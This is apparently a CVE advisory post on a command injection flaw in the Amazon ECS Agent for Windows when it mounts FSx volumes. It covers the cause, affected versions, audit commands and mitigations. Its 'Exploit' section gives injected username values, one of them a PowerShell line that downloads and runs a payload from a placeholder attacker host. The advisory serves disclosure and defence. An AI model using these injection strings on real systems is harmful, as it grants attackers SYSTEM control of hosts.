Listen to this Post
How the mentioned CVE works:
The vulnerability exists in Amazon ECS Agent for Windows versions 1.47.0 through 1.102.2. It stems from improper input validation when mounting FSx Windows File Server volumes. An authenticated remote attacker with permissions to register ECS task definitions or write to Secrets Manager/SSM Parameter Store can craft a malicious username field within an ECS task definition. This username string is injected into an OS command executed by the ECS agent on the Windows host. Due to lack of neutralization, shell metacharacters in the username allow arbitrary command execution. The agent processes the FSx volume configuration and passes unsanitized credentials to a system call. The injection occurs during the mounting phase, before any container isolation. Successful exploitation grants SYSTEM-level privileges on the underlying Windows worker instance. The attack requires no user interaction beyond the ability to submit a task definition. It does not affect Fargate or Linux-based ECS instances. The issue was fixed in agent version 1.103.0 by adding proper input sanitization and command argument separation.
dailycve form:
Platform: ECS Windows
Version: 1.47.0-1.102.2
Vulnerability: Command injection
Severity: High
date: 2025-05-07
Prediction: Patch already available
What Undercode Say:
Check ECS agent version on Windows worker Get-ItemProperty -Path "HKLM:\Software\Amazon\ECS" | Select-Object AgentVersion Simulate malformed username injection (educational) username = "admin & calc.exe" In task definition FSx volume config, this runs calc.exe as SYSTEM List all ECS task definitions with FSx volumes aws ecs list-task-definitions --query "taskDefinitionArns[?contains(@, 'fsx')]" Audit IAM permissions for RegisterTaskDefinition aws iam simulate-principal-policy --policy-source-arn arn:aws:iam::123456789012:user/attacker --action-names ecs:RegisterTaskDefinition
Exploit:
Attacker needs ecs:RegisterTaskDefinition and either secretsmanager:GetSecretValue or ssm:GetParameter. Craft a task definition with an FSx Windows volume. Set the username field to: "DOMAIN\user & powershell -c IEX(New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')". Submit the definition and run a task referencing that volume. The ECS agent injects the username into a net use or mount command, executing the payload with SYSTEM privileges.
Protection from this CVE:
Upgrade ECS agent to >=1.103.0 or use latest Amazon ECS-optimized Windows AMI. If unable to upgrade, restrict ecs:RegisterTaskDefinition to trusted IAM principals only. Also restrict write access to Secrets Manager secrets and SSM parameters referenced in FSx volume configurations. Monitor CloudTrail for unusual RegisterTaskDefinition calls. Use IAM condition keys to limit task definition registration to approved users. Isolate Windows worker instances from untrusted containers.
Impact:
Remote authenticated attacker gains SYSTEM access on Windows ECS host. Full compromise of the worker node, allowing lateral movement to other containers and host resources. Theft of secrets stored on host, ability to escape container isolation, and potential cluster-wide takeover if node runs critical services. All workloads on the same ECS Windows instance become untrusted.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
